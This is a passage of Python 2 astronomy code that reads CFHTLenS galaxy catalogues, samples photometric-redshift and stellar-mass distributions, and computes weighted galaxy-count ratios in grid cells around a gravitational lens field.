'<f8', '<f8', '<f8', '<f8'))\n catfield.add_row([str(gal.split()[0]),gal.split()[4],gal.split()[5],gal.split()[36],gal.split()[60],gal.split()[79],gal.split()[84],gal.split()[39],gal.split()[40],gal.split()[41],gal.split()[61],gal.split()[62],gal.split()[63]])\n #print catfield[0]\n if i in [1000, 5000, 10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000, 100000, 110000, 120000, 130000, 140000, 150000, 160000, 170000, 180000, 190000, 200000]:\n print i, \"objects...\"\n if (catfield['MASK'][0] == 0) and (catfield['star_flag'][0] == 0) and ((catfield['MAG_i'][0] <= float(str(sys.argv[6])) and catfield['MAG_i'][0] > 0) or (catfield['MAG_y'][0] <= float(str(sys.argv[6])) and catfield['MAG_y'][0] > 0)): # above threshold in either i or y bands\n coordfieldwcs = SkyCoord(ra=catfield[0]['ALPHA_J2000']*u.degree, dec=catfield[0]['DELTA_J2000']*u.degree, frame='fk5')\n #print coordfieldwcs.ra.deg, coordfieldwcs.dec.deg\n #print i\n with open('%s_pdz.cat' % [z[0:len(listfields[0])-1] for z in listfields][count]) as pdzcat:\n galpdz=pdzcat.readlines()\n linepdz=galpdz[i]\n with open('%s_mstar.cat' % [z[0:len(listfields[0])-1] for z in listfields][count]) as mstarcat:\n for m in xrange(pos_mstar):\n mstarcat.next()\n for galmstar in mstarcat:\n pos_mstar=pos_mstar+1\n if galmstar!=\"\\n\":\n if galmstar.split()[0]==catfield['ID'][0]:\n linemstar=galmstar\n break\n # classification criteria:\n where = (int(np.max([catfield['Z_B'][0]/0.05, 1])) * 6) # find the position in mstar.cat corresponding to z_b, in order to read chi_star and chi_gal\n #print catfield['ID'][0],float(linemstar.split()[where-1]),float(linemstar.split()[where]),where\n cond1 = str(sys.argv[7])==\"old\"\n cond2 = (str(sys.argv[7])==\"new\") and (((catfield['MAG_i'][0] <=23) and (catfield['MAG_i'][0] >0)) or ((catfield['MAG_y'][0] <=23) and (catfield['MAG_y'][0] >0)))\n if (where < 420) and (float(linemstar.split()[where])!=0):\n cond3 = (str(sys.argv[7])==\"new\") and (float(linemstar.split()[where-1])/float(linemstar.split()[where])<0.5)\n else:\n cond3 = 1>2\n if (where < 420) and (cond1 or cond2 or cond3):\n #print linemstar.split()[0], linepdz.split()[0], catfield['ID'][0]\n coordfieldpix = worldfield.wcs_world2pix(coordfieldwcs.ra.deg, coordfieldwcs.dec.deg, 0)\n x = int((coordfieldpix[0] * pixCFHT) / (240.0 * u.arcsec))\n y = int((coordfieldpix[1] * pixCFHT) / (240.0 * u.arcsec))\n #print \"x,y\",x,y\n cellpix_x = coordfieldpix[0] - (x * 240.0 * u.arcsec / pixCFHT)\n cellpix_y = coordfieldpix[1] - (y * 240.0 * u.arcsec / pixCFHT)\n sep = coordfieldwcs.separation(centerfields[x][y]).arcsec\n if (maskedcell[x][y] >= 0.50):\n if (sep >= 4) and (msk_lens[0].data[(cellpix_y * pixCFHT / pixlens).value][(cellpix_x * pixCFHT / pixlens).value] == 0): # ignore objects too close to the center and masked in the lens catalogue\n #print sep\n # fix anomalouss mass values in CFHTLENS. 
For \"orig\" and \"samp\" the point is to avoid unnecessary reading of the catalogues\n #if (str(sys.argv[8]) == \"orig\") or (str(sys.argv[8]) == \"samp\"):\n if catfield['LP_log10_SM_MED'][0] < 0:\n if float(linemstar.split()[where-3])>0: #mass_med\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[where-3]\n elif float(linemstar.split()[where-5])>0: #mass_best\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[where-5]\n else:\n pos=int(np.max([catfield['Z_B'][0]/0.05, 1]))\n while (pos<69) and (float(linemstar.split()[(pos * 6) - 5])<=0):\n pos=pos+1\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[(pos * 6) - 5]\n if catfield['LP_log10_SM_MED'][0]<=0:\n pos=int(np.max([catfield['Z_B'][0]/0.05, 1]))\n while (pos>1) and (float(linemstar.split()[(pos * 6) - 5])<=0):\n pos=pos-1\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[(pos * 6) - 5]\n if catfield['LP_log10_SM_MED'][0]<=0:\n catfield['LP_log10_SM_MED'][0]=9\n #print \"replaced mass: \", catfield['LP_log10_SM_MED'][0]\n if (catfield['LP_log10_SM_INF'][0] < 0) or (catfield['LP_log10_SM_SUP'][0] < 0):\n catfield['LP_log10_SM_INF'][0]=catfield['LP_log10_SM_MED'][0]-0.1\n catfield['LP_log10_SM_SUP'][0]=catfield['LP_log10_SM_MED'][0]+0.1\n if catfield['Z_B'][0] <= z_s_lens:\n origfield_gal[x][y] = origfield_gal[x][y] + 1\n origfield_zweight[x][y] = origfield_zweight[x][y] + (z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])\n origfield_mass[x][y] = origfield_mass[x][y] + 10**catfield['LP_log10_SM_MED'][0]\n origfield_mass2[x][y] = origfield_mass2[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]))\n origfield_mass3[x][y] = origfield_mass3[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]))\n if (sep <= 10):\n origfield_oneoverr[x][y] = origfield_oneoverr[x][y] + 0.1\n origfield_zoverr[x][y] = origfield_zoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) / 10)\n origfield_massoverr[x][y] = origfield_massoverr[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) / 10)\n origfield_mass2overr[x][y] = origfield_mass2overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / 10)\n origfield_mass3overr[x][y] = origfield_mass3overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / 10)\n origfield_zmassoverr[x][y] = origfield_zmassoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) / 10)\n origfield_zmass2overr[x][y] = origfield_zmass2overr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) / 10)\n else:\n origfield_oneoverr[x][y] = origfield_oneoverr[x][y] + 1. 
/ sep\n origfield_zoverr[x][y] = origfield_zoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) / sep)\n origfield_massoverr[x][y] = origfield_massoverr[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) / sep)\n origfield_mass2overr[x][y] = origfield_mass2overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / sep)\n origfield_mass3overr[x][y] = origfield_mass3overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / sep)\n origfield_zmassoverr[x][y] = origfield_zmassoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) / sep)\n origfield_zmass2overr[x][y] = origfield_zmass2overr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) / sep)\n \n samplesup=np.zeros(int(str(sys.argv[4])))\n sampleinf=np.zeros(int(str(sys.argv[4])))\n fracz=1-1.0*(catfield['Z_B_MAX'][0]-catfield['Z_B'][0])/(catfield['Z_B_MAX'][0]-catfield['Z_B_MIN'][0])\n fracmass=1-(1.0*(10**catfield['LP_log10_SM_SUP'][0]-10**catfield['LP_log10_SM_MED'][0])/(10**catfield['LP_log10_SM_SUP'][0]-10**catfield['LP_log10_SM_INF'][0]))\n #print \"fracmass\"\n #print fracmass\n #print catfield['LP_log10_SM_MED'][i],catfield['LP_log10_SM_SUP'][i],catfield['LP_log10_SM_INF'][i]\n\n #if str(sys.argv[8]) == \"samp\":\n if (fracz > 0) and (fracz < 1):\n samplesup=catfield['Z_B'][0]+abs(np.random.normal(0, catfield['Z_B_MAX'][0]-catfield['Z_B'][0], int(str(sys.argv[4]))))\n sampleinf=catfield['Z_B'][0]-abs(np.random.normal(0, catfield['Z_B'][0]-catfield['Z_B_MIN'][0], int(str(sys.argv[4]))))\n # no negative redshifts\n while len(sampleinf[sampleinf<0]) > 0:\n sampleinf[sampleinf<0]=catfield['Z_B'][0]-abs(np.random.normal(0, catfield['Z_B'][0]-catfield['Z_B_MIN'][0], len(sampleinf[sampleinf<0])))\n rand=np.random.random(int(str(sys.argv[4])))\n samplez=sampleinf\n samplez[np.where(rand>fracz)]=samplesup[np.where(rand>fracz)]\n #samplez[samplez<0]=0\n if (fracz <= 0) or (fracz >= 1):\n samplez=np.random.normal(catfield['Z_B_MIN'][0]+(catfield['Z_B_MAX'][0]-catfield['Z_B_MIN'][0])/2, (catfield['Z_B_MAX'][0]-catfield['Z_B_MIN'][0])/2, int(str(sys.argv[4])))\n #samplez[samplez<0]=0\n # for mass, assume gaussian distribution in log, not normal space, so I don't get things like negative mass\n if (fracmass > 0) and (fracmass < 1):\n samplesup=10**(catfield['LP_log10_SM_MED'][0]+abs(np.random.normal(0, catfield['LP_log10_SM_SUP'][0]-catfield['LP_log10_SM_MED'][0], int(str(sys.argv[4])))))\n sampleinf=10**(catfield['LP_log10_SM_MED'][0]-abs(np.random.normal(0, catfield['LP_log10_SM_MED'][0]-catfield['LP_log10_SM_INF'][0], int(str(sys.argv[4])))))\n rand=np.random.random(int(str(sys.argv[4])))\n samplemass=sampleinf\n samplemass[np.where(rand>fracmass)]=samplesup[np.where(rand>fracmass)]\n if (fracmass <= 0) or (fracmass >= 1):\n samplemass=10**np.random.normal(catfield['LP_log10_SM_INF'][0]+(catfield['LP_log10_SM_SUP'][0]-catfield['LP_log10_SM_INF'][0])/2, (catfield['LP_log10_SM_SUP'][0]-catfield['LP_log10_SM_INF'][0])/2, int(str(sys.argv[4])))\n print samplemass\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n field_gal[x][y][samplez<z_s_lens] = field_gal[x][y][samplez<z_s_lens] + 1\n field_zweight[x][y][samplez<z_s_lens] = field_zweight[x][y][samplez<z_s_lens] + (z_s_lens * 
samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)\n field_mass[x][y][samplez<z_s_lens] = field_mass[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]\n field_mass2[x][y][samplez<z_s_lens] = field_mass2[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**2\n field_mass3[x][y][samplez<z_s_lens] = field_mass3[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**3\n #print (catfield['Z_B_MAX'][i] - catfield['Z_B_MIN'][i])/2\n if (sep <= 10):\n field_oneoverr[x][y][samplez<z_s_lens] = field_oneoverr[x][y][samplez<z_s_lens] + 0.1\n field_zoverr[x][y][samplez<z_s_lens] = field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / 10)\n field_massoverr[x][y][samplez<z_s_lens] = field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / 10)\n field_mass2overr[x][y][samplez<z_s_lens] = field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / 10)\n field_mass3overr[x][y][samplez<z_s_lens] = field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / 10)\n field_zmassoverr[x][y][samplez<z_s_lens] = field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / 10)\n field_zmass2overr[x][y][samplez<z_s_lens] = field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / 10)\n else:\n field_oneoverr[x][y][samplez<z_s_lens] = field_oneoverr[x][y][samplez<z_s_lens] + 1/sep\n field_zoverr[x][y][samplez<z_s_lens] = field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / sep)\n field_massoverr[x][y][samplez<z_s_lens] = field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / sep)\n field_mass2overr[x][y][samplez<z_s_lens] = field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / sep)\n field_mass3overr[x][y][samplez<z_s_lens] = field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / sep)\n field_zmassoverr[x][y][samplez<z_s_lens] = field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / sep)\n field_zmass2overr[x][y][samplez<z_s_lens] = field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / sep)\n \n #if str(sys.argv[8]) == \"tab\":\n massbest_tab=np.zeros(70)\n massinf_tab=np.zeros(70)\n massmed_tab=np.zeros(70)\n masssup_tab=np.zeros(70)\n pdz_tab=np.zeros(70)\n for m in range(69):\n pdz_tab[m]=float(linepdz.split()[2+m][:-1]) # because the last character is comma\n if pdz_tab[m]<0.001:\n pdz_tab[m]=0\n pdz_tab[69]=float(linepdz.split()[71])\n if pdz_tab[69]<0.001:\n pdz_tab[69]=0\n for m in range(70):\n if pdz_tab[m]!=0:\n massbest_tab[m]=float(linemstar.split()[1+6*m])\n if massbest_tab[m]<0:\n massbest_tab[m]=9 # very small number of exceptions\n for m in range(70):\n if pdz_tab[m]!=0:\n massmed_tab[m]=float(linemstar.split()[3+6*m])\n if massmed_tab[m]<0:\n massmed_tab[m]=massbest_tab[m]\n massinf_tab[m]=float(linemstar.split()[2+6*m])\n masssup_tab[m]=float(linemstar.split()[4+6*m])\n if massinf_tab[m]<0:\n massinf_tab[m]=massmed_tab[m]-0.1\n if masssup_tab[m]<0:\n masssup_tab[m]=massmed_tab[m]+0.1\n #print 
ID,m,massbest_tab[m],massinf_tab[m],massmed_tab[m],masssup_tab[m]\n                                custm = stats.rv_discrete(name='custm', values=(zgridint, pdz_tab))\n                                sample=custm.rvs(size=int(str(sys.argv[4])))\n                                iter=0\n                                while len(sample[pdz_tab[sample]==0]) != 0: # happens because the probabilities do not sum exactly to 1; first reshuffle up to 10 times; if this does not solve the problem, replace with the value having maximum probability\n                                    iter=iter+1\n                                    sample=custm.rvs(size=int(str(sys.argv[4])))\n                                    if iter==10:\n                                        print pdz_tab,catfield['ID'][0],sample,str(sys.argv[1])\n                                        sample[pdz_tab[sample]==0]=np.where(pdz_tab==np.max(pdz_tab[sample[pdz_tab[sample]!=0]]))[0][0]\n                                #print zgrid[sample],catfield['ID'][0]\n                                samplez=zgrid[sample]\n                                sample_massinf_tab=massinf_tab[sample] # since "sample" is constant, this ensures that Mstar corresponds to z\n                                sample_massmed_tab=massmed_tab[sample]\n                                sample_masssup_tab=masssup_tab[sample]\n                                sample_lenssup=np.zeros(int(str(sys.argv[4])))\n                                sample_lensinf=np.zeros(int(str(sys.argv[4])))\n                                #print sample_massmed_tab, samplez, catfield['ID'][0]\n                                for l in range(int(str(sys.argv[4]))):\n                                    if sample_massmed_tab[l]==0: # I SHOULD NOT HAVE TO DO THIS, THERE IS A BUG\n                                        sample_massmed_tab[l]=9\n                                        sample_massinf_tab[l]=8.9\n                                        sample_masssup_tab[l]=9.1\n                                        print "Exception!", catfield['ID'][0]\n                                    sample_lenssup[l]=10**(sample_massmed_tab[l]+abs(np.random.normal(0, sample_masssup_tab[l]-sample_massmed_tab[l], 1)))\n                                    sample_lensinf[l]=10**(sample_massmed_tab[l]-abs(np.random.normal(0, sample_massmed_tab[l]-sample_massinf_tab[l], 1)))\n                                    rand=np.random.random(1)\n                                    samplemass[l]=sample_lensinf[l]\n                                    fracmass=1-(1.0*(10**sample_masssup_tab[l]-10**sample_massmed_tab[l])/(10**sample_masssup_tab[l]-10**sample_massinf_tab[l]))\n                                    if rand>fracmass:\n                                        samplemass[l]=sample_lenssup[l]\n                                #print catfield['ID'][0]\n                                #print zgrid[sample]\n                                #print samplemass[sample]\n                                #print massinf_tab[sample]\n                                #print massmed_tab[sample]\n                                #print masssup_tab[sample]\n                                # ignore objects with z>z_source for all weights when drawing from the z PDF\n                                tab_field_gal[x][y][samplez<z_s_lens] = tab_field_gal[x][y][samplez<z_s_lens] + 1\n                                tab_field_zweight[x][y][samplez<z_s_lens] = tab_field_zweight[x][y][samplez<z_s_lens] + (z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)\n                                tab_field_mass[x][y][samplez<z_s_lens] = tab_field_mass[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]\n                                tab_field_mass2[x][y][samplez<z_s_lens] = tab_field_mass2[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**2\n                                tab_field_mass3[x][y][samplez<z_s_lens] = tab_field_mass3[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**3\n                                #print (catfield['Z_B_MAX'][i] - catfield['Z_B_MIN'][i])/2\n                                if (sep <= 10):\n                                    tab_field_oneoverr[x][y][samplez<z_s_lens] = tab_field_oneoverr[x][y][samplez<z_s_lens] + 0.1\n                                    tab_field_zoverr[x][y][samplez<z_s_lens] = tab_field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / 10)\n                                    tab_field_massoverr[x][y][samplez<z_s_lens] = tab_field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / 10)\n                                    tab_field_mass2overr[x][y][samplez<z_s_lens] = tab_field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / 10)\n                                    tab_field_mass3overr[x][y][samplez<z_s_lens] = tab_field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / 10)\n                                    tab_field_zmassoverr[x][y][samplez<z_s_lens] = tab_field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * 
samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / 10)\n tab_field_zmass2overr[x][y][samplez<z_s_lens] = tab_field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / 10)\n else:\n tab_field_oneoverr[x][y][samplez<z_s_lens] = tab_field_oneoverr[x][y][samplez<z_s_lens] + 1/sep\n tab_field_zoverr[x][y][samplez<z_s_lens] = tab_field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / sep)\n tab_field_massoverr[x][y][samplez<z_s_lens] = tab_field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / sep)\n tab_field_mass2overr[x][y][samplez<z_s_lens] = tab_field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / sep)\n tab_field_mass3overr[x][y][samplez<z_s_lens] = tab_field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / sep)\n tab_field_zmassoverr[x][y][samplez<z_s_lens] = tab_field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / sep)\n tab_field_zmass2overr[x][y][samplez<z_s_lens] = tab_field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / sep)\n\n #if str(sys.argv[8]) == \"orig\":\n origfield_mass2rms = np.sqrt(origfield_mass2)\n origfield_mass3rms = scipy.special.cbrt(origfield_mass3)\n origfield_mass2overrrms = np.sqrt(origfield_mass2overr)\n origfield_mass3overrrms = scipy.special.cbrt(origfield_mass3overr)\n #if str(sys.argv[8]) == \"samp\":\n field_mass2rms = np.sqrt(field_mass2)\n field_mass3rms = scipy.special.cbrt(field_mass3)\n field_mass2overrrms = np.sqrt(field_mass2overr)\n field_mass3overrrms = scipy.special.cbrt(field_mass3overr)\n #if str(sys.argv[8]) == \"tab\":\n tab_field_mass2rms = np.sqrt(tab_field_mass2)\n tab_field_mass3rms = scipy.special.cbrt(tab_field_mass3)\n tab_field_mass2overrrms = np.sqrt(tab_field_mass2overr)\n tab_field_mass3overrrms = scipy.special.cbrt(tab_field_mass3overr)\n\n #if str(sys.argv[8]) == \"orig\":\n origq_gal = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zweight = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2 = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3 = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_massoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2rms = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3rms = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2overrrms = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3overrrms = np.zeros((cells_on_a_side,cells_on_a_side))\n #if str(sys.argv[8]) == \"samp\":\n q_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass = 
np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n #if str(sys.argv[8]) == \"tab\":\n tab_q_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n if maskedcell[i][j] >= 0.50: # skipping the cells with large masked area\n #if str(sys.argv[8]) == \"orig\":\n origq_gal[i][j] = gal_lensorig[i][j] * 1.0 / origfield_gal[i][j]\n origq_zweight[i][j] = zweight_lensorig[i][j] * 1.0 / origfield_zweight[i][j]\n origq_mass[i][j] = mass_lensorig[i][j] * 1.0 / origfield_mass[i][j]\n origq_mass2[i][j] = mass2_lensorig[i][j] * 1.0 / origfield_mass2[i][j]\n origq_mass3[i][j] = mass3_lensorig[i][j] * 1.0 / origfield_mass3[i][j]\n origq_oneoverr[i][j] = oneoverr_lensorig[i][j] * 1.0 / origfield_oneoverr[i][j]\n origq_zoverr[i][j] = zoverr_lensorig[i][j] * 1.0 / origfield_zoverr[i][j]\n origq_massoverr[i][j] = massoverr_lensorig[i][j] * 1.0 / origfield_massoverr[i][j]\n origq_mass2overr[i][j] = mass2overr_lensorig[i][j] * 1.0 / origfield_mass2overr[i][j]\n origq_mass3overr[i][j] = mass3overr_lensorig[i][j] * 1.0 / origfield_mass3overr[i][j]\n origq_zmassoverr[i][j] = zmassoverr_lensorig[i][j] * 1.0 / origfield_zmassoverr[i][j]\n origq_zmass2overr[i][j] = zmass2overr_lensorig[i][j] 
* 1.0 / origfield_zmass2overr[i][j]\n origq_mass2rms[i][j] = mass2rms_lensorig[i][j] * 1.0 / origfield_mass2rms[i][j]\n origq_mass3rms[i][j] = mass3rms_lensorig[i][j] * 1.0 / origfield_mass3rms[i][j]\n origq_mass2overrrms[i][j] = mass2overrrms_lensorig[i][j] * 1.0 / origfield_mass2overrrms[i][j]\n origq_mass3overrrms[i][j] = mass3overrrms_lensorig[i][j] * 1.0 / origfield_mass3overrrms[i][j]\n #if str(sys.argv[8]) == \"samp\":\n q_gal[i][j] = gal_lens[i][j] * 1.0 / field_gal[i][j]\n q_oneoverr[i][j] = oneoverr_lens[i][j] * 1.0 / field_oneoverr[i][j]\n q_zweight[i][j] = zweight_lens[i][j] * 1.0 / field_zweight[i][j]\n q_mass[i][j] = mass_lens[i][j] * 1.0 / field_mass[i][j]\n q_mass2[i][j] = mass2_lens[i][j] * 1.0 / field_mass2[i][j]\n q_mass3[i][j] = mass3_lens[i][j] * 1.0 / field_mass3[i][j]\n q_zoverr[i][j] = zoverr_lens[i][j] * 1.0 / field_zoverr[i][j]\n q_massoverr[i][j] = massoverr_lens[i][j] * 1.0 / field_massoverr[i][j]\n q_mass2overr[i][j] = mass2overr_lens[i][j] * 1.0 / field_mass2overr[i][j]\n q_mass3overr[i][j] = mass3overr_lens[i][j] * 1.0 / field_mass3overr[i][j]\n q_zmassoverr[i][j] = zmassoverr_lens[i][j] * 1.0 / field_zmassoverr[i][j]\n q_zmass2overr[i][j] = zmass2overr_lens[i][j] * 1.0 / field_zmass2overr[i][j]\n q_mass2rms[i][j] = mass2rms_lens[i][j] * 1.0 / field_mass2rms[i][j]\n q_mass3rms[i][j] = mass3rms_lens[i][j] * 1.0 / field_mass3rms[i][j]\n q_mass2overrrms[i][j] = mass2overrrms_lens[i][j] * 1.0 / field_mass2overrrms[i][j]\n q_mass3overrrms[i][j] = mass3overrrms_lens[i][j] * 1.0 / field_mass3overrrms[i][j]\n #if str(sys.argv[8]) == \"tab\":\n tab_q_gal[i][j] = gal_lens_tab[i][j] * 1.0 / tab_field_gal[i][j]\n tab_q_oneoverr[i][j] = oneoverr_lens_tab[i][j] * 1.0 / tab_field_oneoverr[i][j]\n tab_q_zweight[i][j] = zweight_lens_tab[i][j] * 1.0 / tab_field_zweight[i][j]\n tab_q_mass[i][j] = mass_lens_tab[i][j] * 1.0 / tab_field_mass[i][j]\n tab_q_mass2[i][j] = mass2_lens_tab[i][j] * 1.0 / tab_field_mass2[i][j]\n tab_q_mass3[i][j] = mass3_lens_tab[i][j] * 1.0 / tab_field_mass3[i][j]\n tab_q_zoverr[i][j] = 